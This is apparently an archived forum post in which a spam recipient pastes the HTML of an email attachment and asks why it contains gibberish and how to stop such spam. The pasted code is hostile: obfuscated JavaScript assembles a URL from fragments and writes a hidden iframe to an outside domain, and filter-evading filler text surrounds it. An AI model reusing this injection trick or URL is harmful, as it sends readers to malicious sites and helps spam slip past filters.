"Ninja" Attachments

Spammers got smarter, it seems.

<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-2">
</HEAD>
<BODY>
<DIV style="height: 204px; left: 50%; margin: -100px 0 0 -209px; position: absolute; top: 50%; width: 408px;">Certainly the court to turn Hold of whom your hand</DIV>
<!-- Eight or even an opportunity of austria Louis xiii had happened to retire Thus he might not here Nobody knows that are rich Resumed their lives of honor Is arrested and good man to kill Blood and followed them they -->
<scri_pt type="text/java scri_pt">
var rcfj1 = "ht";
var rcfj2 = "tp://lmluio4.geoo";
var rcfj3 = "apiouh.";
var rcfj4 = "com/?hhoyjucnxv";
document.write('<ifr'); document.write('ame src='+'"'+rcfj1+rcfj2+rcfj3+rcfj4); document.write('"></ifr'); document.write('ame>');
</scri_pt>
</BODY>
</HTML>

But SpamCop should be even smarter and it should decypher stuff like this (it apparently doesn't as of now).

This was the content of an .html attachment these type of spammers often send me.

I also don't get the

Certainly the court to turn Hold of whom your hand

nor the

Eight or even an opportunity of austria Louis xiii had happened to retire Thus he might not here Nobody knows that are rich Resumed their lives of honor Is arrested and good man to kill Blood and followed them they

Er, okay.. what? Now that I think of it, it must be the same spammer which is sending me a different type of spam. Before, they sent me messages directly containing those senseless words and a link in the message's body. Now, those words are inside the .html, while the message itself KIND OF makes sense (even if it now contains no URLs).

Why do thy write that stuff? What do they use that gibberish for?

I hoped I had gotten rid of those stupid spammers, but I guess not. Any hint about how to completely get rid of them..? It's probably impossible, but I'll ask anyways. I wish I finally stopped receiving those stupid messages in my e-mail. No, sadly changing e-mail address isn't an option, nor will reporting harm them much, if at all.

Archived